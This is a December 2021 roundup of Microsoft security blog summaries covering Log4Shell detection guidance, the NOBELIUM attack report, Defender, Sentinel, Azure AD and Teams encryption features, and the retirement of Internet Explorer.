Microsoft Security Saturday – 12/18/2021

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitationMicrosoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”.

The final report on NOBELIUM’s unprecedented nation-state attackThis is the final post in a four-part series on the NOBELIUM nation-state cyberattack. In December 2020, Microsoft began sharing details with the world about what became known as the most sophisticated nation-state cyberattack in history. Microsoft’s four-part video series “Decoding NOBELIUM” pulls the curtain back on the NOBELIUM incident and how world-class threat hunters from Microsoft and around the industry came together to take on the most sophisticated nation-state attack in history. In this last post, we’ll reflect on lessons learned as covered in the fourth episode of the docuseries. 

Block USB in Microsoft Defender for Endpoint and IntuneA common request from information security teams is the ability to block mass storage devices. As every security defender knows, you cannot draw a hard line and block EVERY USB mass storage device. Exceptions will always come up. In this blog article, I’ll show you how to configure the ability to block mass storage devices with an allow list that you can maintain in Intune and Microsoft Defender for Endpoint.

Defender for Office – Attack Simulation End user email notifications are now customizable!Attack Simulation Training is an intelligent phish risk reduction tool that measures behavior change and automates the deployment of an integrated security awareness training program across an organization. It is available with Microsoft 365 E5 or Microsoft Defender for Office 365 P2 plan. In a phishing simulation, admins can use end user email notifications to inform targeted users about their participation in the campaign or to appreciate a successful phishing report.

M365 Defender CloudAppEvents in advanced hunting now includes non-Microsoft apps and new data columnsWe are pleased to share that we have expanded coverage of the CloudAppEvents table in advanced hunting to now include non-Microsoft cloud app activities monitored by Microsoft Defender for Cloud Apps. In addition, we have added new columns to the CloudAppEvents table like IsExternalUser, IsImpersonated, and more. Together, these enhancements can help you better hunt for threats in cloud app activities using advanced hunting in Microsoft 365 Defender.

How Defender for Cloud displays machines affected by Log4j vulnerabilitiesIn situations like this, organizations that are using Microsoft Defender for Cloud can immediately begin investigations – even before there’s a CVE number – with our Inventory tools as shown below.

Forward On-Premises Windows Security Event Logs to Microsoft Sentinel There is no need to load an agent on every device to capture the Windows Security Event Logs from your on-premises Windows workstations & servers. Windows hosts already have this built into the operating system.  To capture the events without having to load the Azure Monitoring Agent (AMA) the Windows Event Forwarding process can be used to send logs to a “Windows Event Collector” (WEC). The WEC will then need the AMA loaded to send the events to a Log Analytics Workspace (LAW) that is monitored by Microsoft Sentinel.

What’s New: Detecting Apache Log4j vulnerabilities with Microsoft SentinelMicrosoft’s security research teams have been tracking threats taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell” and tracked as CVE-2021-44228. The vulnerability allows unauthenticated remote code execution and is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component.

Microsoft Sentinel – SAP continuous threat monitoring workbooks In May 2021, Microsoft announced a new threat monitoring protection for SAP systems in Microsoft Sentinel. Since then, we’ve continuously increased our out-of-the-box, predefined content, and after you’ve deployed the solution in your Microsoft Sentinel workspace, 50 different analytics rules, watchlists, and workbooks are added. In this blog we’ll go over the different features supported by our new workbooks. 

Microsoft Sentinel Jupyter Notebooks knowledge check test Microsoft Sentinel leverages a common API to expand the SIEM’s native capabilities by providing access to external tools such as Jupyter notebooks and Python. Jupyter extends the scope of what you can do with data in Microsoft Sentinel. It combines full programmability with a huge collection of libraries for machine learning, visualization, and data analysis to enhance investigations and threat hunting.

Simplify your identity provisioning with these new Azure AD capabilitiesWith the continued evolution and adoption of hybrid work, we know how critical a strong identity and governance control plane is for IT scalability and a seamless user experience. Today, we are excited to share new Azure Active Directory (Azure AD) capabilities and best practices that can help organizations with these needs. With these updates, organizations will now be able to allow password writeback from the cloud when using Azure AD Connect cloud sync, provision to on-premises applications, verify their SCIM provisioning endpoints, and more. 

Intrinsic infratructure security for the hybrid worldNow, we are further excited to announce the release of a new version of the Dell EMC OpenManage extension with Windows Admin Center that includes key new security-themed features. The OpenManage extension brings in intrinsic security management streamlined for Azure Stack HCI and Windows Server. Complementing Windows Admin Center’s native Security tool, the Dell EMC OpenManage extension helps IT administrators configure Secured-core server end-to-end from the BIOS level.

Govern your Snowflake data with Azure PurviewAzure Purview as a unified data governance service keeps expanding support for various data sources across on-premises, multi-cloud, and SaaS applications. It helps you generate a holistic, up-to-date map of your data landscape with automated data discovery. Now you can easily bring over metadata from Snowflake by scanning your Snowflake databases, then manage and govern your Snowflake data in Azure Purview.

End-to-end encryption for one-to-one Microsoft Teams calls now Generally AvailableIn October, we announced the public preview of end-to-end encryption (E2EE) support for Microsoft Teams calls. Today, we are happy to announce that E2EE for Teams calls is now generally available. IT admins will have the option to enable and control the feature for their organization once the update has been received.

Modernize security with Microsoft Edge and IE modeAre you ensuring your organization is secured with a modern web browser? On June 15, 2022, Internet Explorer 11 (“IE11”) desktop application will retire and go out of support for certain versions of Windows 10. With the rise of phishing attacks and users spending 60% of their time in the browser while on a PC, the browser is an important vector to consider in your organization’s Zero Trust strategy.